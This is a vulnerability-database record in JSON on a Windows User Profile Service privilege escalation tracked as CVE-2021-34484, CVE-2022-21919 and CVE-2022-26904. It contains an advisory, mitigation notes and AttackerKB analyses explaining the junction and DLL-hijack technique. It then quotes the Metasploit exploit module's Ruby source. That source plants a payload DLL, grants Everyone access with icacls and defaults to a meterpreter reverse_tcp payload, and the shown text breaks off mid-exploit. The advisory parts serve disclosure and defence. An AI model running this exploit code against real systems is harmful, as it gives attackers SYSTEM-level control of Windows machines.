DATABASE RESOURCES PRICING ABOUT US

{"id": "HIVEPRO:98B56CB60C0C2B248824B5ECAE47E387", "vendorId": null, "type": "hivepro", "bulletinFamily": "info", "title": "Microsoft\u2019s privilege escalation vulnerability that refuses to go away", "description": "THREAT LEVEL: Amber. For a detailed advisory, download the pdf file here After seven months, a vulnerability that was addressed in August 2021 patch Tuesday remained unpatched. This locally exploited vulnerability is tracked as CVE-2021-34484 and affects the Windows User Profile Service. While Proof-of-concept is been available for some time now, it is not been actively exploited in the wild. This Elevation of Privilege vulnerability was found by renowned researcher Abdelhamid Naceri and reported to Microsoft, which addressed it in their August 2021 release. Naceri noted that Microsoft's fix was incomplete soon after it was issued and presented a proof of concept (POC) that bypassed it on all Windows versions. That is when the 0patch team, published an unofficial security update for all Windows versions and made it available for free download to all registered users. Microsoft then patched this security flaw in their January 2022 release, tracking it as CVE-2022-21919. Naceri, on the other hand, discovered a way around this second patch. However, Microsoft's second attempt to fix the bug altered the "profext.dll" file, resulting in the removal of the unofficial workaround of 0patch from everyone who had installed the January 2022 Windows updates. Organizations could apply the 0patch unofficial patch to patch this vulnerability using the steps given below: 1. Update Windows 10 to the latest March 2022 patch.2. Create a free account in 0patch Central3. Install and register the 0patch Agent4. An automated micro-patching process will initiate to apply this patch. Potential MITRE ATT&CK TTPs are: TA0042: Resource DevelopmentT1588: Obtain CapabilitiesT1588.006: Obtain Capabilities: VulnerabilitiesTA0001: Initial AccessT1190: Exploit Public-Facing ApplicationTA0004: Privilege EscalationT1068: Exploitation for Privilege EscalationTA0005: Defense Evasion T1548: Abuse Elevation Control Mechanism Vulnerability Details References https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484 https://www.bleepingcomputer.com/news/microsoft/windows-zero-day-flaw-giving-admin-rights-gets-unofficial-patch-again/ https://blog.0patch.com/2022/03/a-bug-that-doesnt-want-to-die-cve-2021.html", "published": "2022-03-25T13:56:19", "modified": "2022-03-25T13:56:19", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "LOCAL", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 6.9}, "severity": "MEDIUM", "exploitabilityScore": 3.4, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://www.hivepro.com/microsofts-privilege-escalation-vulnerability-that-refuses-to-go-away/", "reporter": "Hive Pro", "references": [], "cvelist": ["CVE-2021-34484", "CVE-2022-21919"], "immutableFields": [], "lastseen": "2022-03-25T14:28:59", "viewCount": 20, "enchantments": {"score": {"value": 0.9, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:2A1BFBBE-FD48-497E-8F3E-BB65670A94FA", "AKB:5ABBD3E2-AA30-41CB-96DA-34B5E76D030C", "AKB:C32E9872-B8A4-43F3-A8CC-05532AA65E51"]}, {"type": "avleonov", "idList": ["AVLEONOV:535BC5E36A5D2C8F60753A2CD4676692"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2022-0003"]}, {"type": "cve", "idList": ["CVE-2021-34484", "CVE-2022-21895", "CVE-2022-21919"]}, {"type": "hivepro", "idList": ["HIVEPRO:C224B728F67C8D1703A8BF2411600695", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093"]}, {"type": "kaspersky", "idList": ["KLA12250", "KLA12259", "KLA12422", "KLA12423"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:DACEDE0F6B5888B6C6E281338C4B9980"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_26904_SUPERPROFILE-"]}, {"type": "mscve", "idList": ["MS:CVE-2021-34484", "MS:CVE-2022-21895", "MS:CVE-2022-21919"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_AUG_5005030.NASL", "SMB_NT_MS21_AUG_5005031.NASL", "SMB_NT_MS21_AUG_5005033.NASL", "SMB_NT_MS21_AUG_5005040.NASL", "SMB_NT_MS21_AUG_5005043.NASL", "SMB_NT_MS21_AUG_5005089.NASL", "SMB_NT_MS21_AUG_5005094.NASL", "SMB_NT_MS21_AUG_5005095.NASL", "SMB_NT_MS21_AUG_5005106.NASL", "SMB_NT_MS22_JAN_5009543.NASL", "SMB_NT_MS22_JAN_5009545.NASL", "SMB_NT_MS22_JAN_5009546.NASL", "SMB_NT_MS22_JAN_5009555.NASL", "SMB_NT_MS22_JAN_5009557.NASL", "SMB_NT_MS22_JAN_5009566.NASL", "SMB_NT_MS22_JAN_5009585.NASL", "SMB_NT_MS22_JAN_5009595.NASL", "SMB_NT_MS22_JAN_5009601.NASL", "SMB_NT_MS22_JAN_5009619.NASL", "SMB_NT_MS22_JAN_5009621.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:20364300767E58631FFE0D21622E63A3", "RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD"]}, {"type": "securelist", "idList": ["SECURELIST:11665FFD7075FB9D59316195101DE894"]}, {"type": "thn", "idList": ["THN:00A15BC93C4697B74FA1D56130C0C35E", "THN:BABD510622DAA320F3F1F55EEDD7549A"]}, {"type": "threatpost", "idList": ["THREATPOST:05E04E358AB0AB9A5BF524854B34E49D", "THREATPOST:53A062956C31459E2846CD4C959DFD49", "THREATPOST:84909E392F4171398A52202CCC4E215A", "THREATPOST:95B32358658F5FEFA1715F69C5D6051D"]}, {"type": "zdi", "idList": ["ZDI-21-966"]}, {"type": "zdt", "idList": ["1337DAY-ID-37625"]}]}, "epss": [{"cve": "CVE-2021-34484", "epss": "0.001340000", "percentile": "0.468380000", "modified": "2023-03-19"}, {"cve": "CVE-2022-21919", "epss": "0.008330000", "percentile": "0.794290000", "modified": "2023-03-19"}], "vulnersScore": 0.9}, "_state": {"score": 1684013994, "dependencies": 1659988328, "epss": 1679287104}, "_internal": {"score_hash": "e283f4976f3cafc045453f24b7acb0c9"}}

{"attackerkb": [{"lastseen": "2023-06-14T14:47:42", "description": "Windows User Profile Service Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**ccondon-r7** at March 29, 2022 12:10pm UTC reported:\n\nThis bug was evidently [used by LAPSUS$](<https://twitter.com/billdemirkapi/status/1508527492285575172>) in the wild as part of the attack on Okta.\n\n**gwillcox-r7** at March 30, 2022 4:21pm UTC reported:\n\nThis bug was evidently [used by LAPSUS$](<https://twitter.com/billdemirkapi/status/1508527492285575172>) in the wild as part of the attack on Okta.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T00:00:00", "type": "attackerkb", "title": "CVE-2021-34484", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2021-08-24T00:00:00", "id": "AKB:2A1BFBBE-FD48-497E-8F3E-BB65670A94FA", "href": "https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-29T02:20:49", "description": "Windows User Profile Service Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 30, 2022 4:52pm UTC reported:\n\nThis is a bypass for [CVE-2022-21919](<https://attackerkb.com/topics/2sQXBnLJYq/cve-2022-21919>) which is in turn a bypass for [CVE-2021-34484](<https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484?referrer=search>). As noted at <https://twitter.com/billdemirkapi/status/1508527492285575172>, CVE-2022-21919 was already being exploited in the wild by using the binary from <https://github.com/klinix5/ProfSvcLPE/blob/main/DoubleJunctionEoP/Release/UserProfileSvcEoP.exe>.\n\nThe vulnerability, near as I can tell, occurs due to the `CreateDirectoryJunction()` function inside `profext.dll` not appropriately validating things before creating a directory junction between two directories. This can allow an attacker to create a directory junction between a directory they have access to and another directory that they should not have access to, thereby granting them the ability to plant files in sensitive locations and or read sensitive files.\n\nThe exploit code for this, which was originally at <https://github.com/klinix5/SuperProfile> but which got taken down, is now available at <https://github.com/rmusser01/SuperProfile> and its associated forks. I have taken this code and updated it and touched it up a bit into a Metasploit exploit module that is now available at <https://github.com/rapid7/metasploit-framework/pull/16382>.\n\nThis exploit code utilizes this vulnerability to plant a malicious `comctl32.dll` binary in a location that the `Narrator.exe` program will try to load the DLL from when it starts. By utilizing the `ShellExecute` command with the `runas` option, we can force a UAC prompt to come up that will run the `consent.exe` program to run. If the `PromptOnSecureDesktop` setting is set to `1` which is the default, this will result in `consent.exe` running as `SYSTEM` on the secure desktop, and a new `narrator.exe` instance will also spawn as `SYSTEM` on the secure desktop, which will then load the malicious `comctl32.dll` DLL and allow us to execute our code as `SYSTEM`.\n\nNote that if `PromptOnSecureDesktop` is set to 0 under the key `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System`, then this LPE will not be possible as the UAC prompt will spawn as the current user vs as `SYSTEM` on the restricted desktop, and therefore we will not achieve privilege elevation, so this is a workaround for the vulnerability whilst it is not patched.\n\nIt should be noted that as this stands the current exploit requires valid credentials for another user on the system who is a non-admin user and who has permissions to log into the target computer. They must also have a profile under `C:\\Users` for the exploit to function in its current state. There has been some rumors that it might be possible to do this without a secondary login, however nothing concrete has been found so far, so we are considering this a prerequisite for exploitation for the time being.\n\nWe, aka Rapid7, have reported this vulnerability to Microsoft and have given KLINIX5, who originally found this vulnerability and wrote the original exploit code, full credit for the discovery, however Microsoft have only given us this CVE number and have not provided a timeline on when they expect a fix for this vulnerability at this time. It is therefore recommended to use the mitigation above until an appropriate fix is developed.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-29T00:00:00", "type": "attackerkb", "title": "CVE-2022-26904", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2023-06-29T00:00:00", "id": "AKB:5ABBD3E2-AA30-41CB-96DA-34B5E76D030C", "href": "https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-15T11:22:27", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21895.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at January 12, 2022 12:07am UTC reported:\n\nUpdate: As predicted there is a patch bypass for this, now labled as [CVE-2022-26904](<https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904>)\n\nAccording to <https://twitter.com/KLINIX5/status/1480996599165763587> this appears to be a patch for the code blogged about at <https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html>. The details on this bug can be found at <https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx> but I\u2019ll summarize them here for brevity.\n\nThe original incomplete patch, aka [CVE-2021-34484](<https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484>) is explained best by Mitja Kolsek at <https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html> where he notes that bug was originally considered to be an arbitrary directory deletion bug that allowed a logged on user to delete a folder on the computer.\n\nHowever upon reviewing the fix KLINUX5 found that it was possible to not only bypass the fix, but also make the vulnerability more impactful.\n\nSpecifically by abusing the User Profile Service\u2019s code which creates a temporary user profile folder (to protect against the original user profile folder being damaged etc), and then copies folders and files from the original profile folder to the backup, one can instead place a symbolic link. When this symbolic link is followed, it can allow the attacker to create attacker-writeable folders in a protected location and then perform a DLL hijacking attack against high privileged system processes.\n\nUnfortunately when patching this bug, Microsoft correctly assumed that one should check that the temporary user folder (aka `C:\\Users\\TEMP`), is not a symbolic link, but didn\u2019t check to see if any of the folders under `C:\\Users\\TEMP` contains a symbolic link.\n\nNote that as noted in <https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html> this bug does require winning a race condition so exploitation is 100% reliable however there are ways to win the race condition as was shown in the code for the patch bypass published at <https://github.com/klinix5/ProfSvcLPE/tree/main/DoubleJunctionEoP>.\n\nI\u2019d keep an eye on this one as KLINIX5 has a habit of finding patch bypasses for his bugs and if he says Microsoft has messed things up again, more than likely there will be another patch bypass for this bug. I\u2019m still looking into exactly what was patched here though.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-08T00:00:00", "type": "attackerkb", "title": "CVE-2022-21919", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21895", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-02-08T00:00:00", "id": "AKB:C32E9872-B8A4-43F3-A8CC-05532AA65E51", "href": "https://attackerkb.com/topics/2sQXBnLJYq/cve-2022-21919", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-21T21:04:38", "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of the junctions it tries to link together. Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user. Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it as CVE-2022-26904. It is important to note that the credentials supplied for the second user to log in as in this exploit must be those of a normal non-admin user and these credentials must also corralate with a user who has already logged in at least once before. Additionally the current user running the exploit must have UAC set to the highest level, aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances where this setting has been changed either manually or as part of the installation process.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T17:05:48", "type": "metasploit", "title": "User Profile Arbitrary Junction Creation Local Privilege Elevation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2023-06-16T00:07:35", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_26904_SUPERPROFILE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2022_26904_superprofile/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Version\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'User Profile Arbitrary Junction Creation Local Privilege Elevation',\n 'Description' => %q{\n The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also corralate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'KLINIX5', # Aka Abdelhamid Naceri. Original PoC w Patch Bypass\n 'Grant Willcox' # Metasploit module + Tweaks to PoC\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows 11', { 'Arch' => ARCH_X64 } ]\n ],\n 'References' => [\n ['CVE', '2022-26904'],\n ['URL', 'https://github.com/rmusser01/SuperProfile'], # Original link was at https://github.com/klinix5/SuperProfile/ but was taken down. This is a backup.\n ['URL', 'https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html'], # Original blog post\n ['URL', 'https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx'] # Discussion of previous iterations of this bug providing insight into patched functionality.\n ],\n 'DisclosureDate' => '2022-03-17', # Date MSRC supplied CVE number, bug is not patched atm.\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'Reliability' => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]\n },\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 300\n },\n 'AKA' => [ 'SuperProfile' ]\n }\n )\n )\n\n register_options([\n OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),\n OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. Ensures we log into the right domain.', '.']),\n OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])\n ])\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n version = get_version_info\n unless version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Win10_21H2) ||\n version.build_number == Msf::WindowsVersion::Win11_21H2 ||\n version.build_number == Msf::WindowsVersion::Server2022\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n print_status('Checking if PromptOnSecureDesktop mitigation applied...')\n reg_key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'\n reg_val = 'PromptOnSecureDesktop'\n begin\n root_key, base_key = @session.sys.registry.splitkey(reg_key)\n value = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)\n rescue Rex::Post::Meterpreter::RequestError => e\n return CheckCode::Unknown(\"Was not able to retrieve the PromptOnSecureDesktop value. Error was #{e}\")\n end\n\n if value.data == 0\n return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')\n elsif value.data == 1\n print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')\n else\n return CheckCode::Unknown(\"PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?\")\n end\n\n # Build numbers taken from https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26904, and associated\n # security update information (e.g. https://support.microsoft.com/en-us/topic/windows-10-update-history-857b8ccb-71e4-49e5-b3f6-7073197d98fb,\n # https://support.microsoft.com/en-us/topic/windows-11-version-21h2-update-history-a19cd327-b57f-44b9-84e0-26ced7109ba9)\n if version.build_number == Msf::WindowsVersion::Win11_21H2 && version.build_number.revision_number.between?(0, 612)\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Server2022 && version.build_number.revision_number.between?(0, 642)\n return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_21H2 && version.build_number.revision_number.between?(0, 1644)\n return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_21H1 && version.build_number.revision_number.between?(0, 1644)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_20H2 && version.build_number.revision_number.between?(0, 1644)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_2004\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1909 && version.build_number.revision_number.between?(0, 2211)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1903\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1809 && version.build_number.revision_number.between?(0, 2802)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1803\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1709\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1703\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1607 && version.build_number.revision_number.between?(0, 5065)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1511\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1507\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win81 # Includes Server 2012 R2\n target_not_presently_supported\n return CheckCode::Detected('Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win8 # Includes Server 2012\n target_not_presently_supported\n return CheckCode::Detected('Windows 8/Windows Server 2012 build detected!')\n elsif version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win7_SP1) # Includes Server 2008 R2\n target_not_presently_supported\n return CheckCode::Detected('Windows 7/Windows Server 2008 R2 build detected!')\n elsif version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Server2008_SP2_Update) # Includes Server 2008\n target_not_presently_supported\n return CheckCode::Detected('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check_target_is_running_supported_windows_version\n if !sysinfo['OS'].include?('Windows')\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif get_version_info.build_number < Msf::WindowsVersion::Win10_InitialRelease\n fail_with(Failure::NoTarget, 'Target is running Windows, but not a version this module supports! Bailing...')\n end\n end\n\n def exploit\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n check_target_is_running_supported_windows_version\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\#{Rex::Text.rand_text_alpha(6..13)}.dll\"\n print_status(\"Writing malicious DLL to #{malicious_dll_location}\")\n write_file(malicious_dll_location, payload_dll)\n\n print_status('Marking DLL as full access for Everyone so that there are no access issues as the secondary user...')\n cmd_exec(\"icacls #{malicious_dll_location} /grant Everyone:(F)\")\n register_file_for_cleanup(malicious_dll_location)\n\n # Register the directories we create for cleanup\n register_dir_for_cleanup('C:\\\\Windows\\\\System32\\\\Narrator.exe.Local')\n register_dir_for_cleanup('C:\\\\Users\\\\TEMP')\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')\n library_path = ::File.expand_path(library_path)\n\n dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s\n\n @session_obtained_bool = false\n # 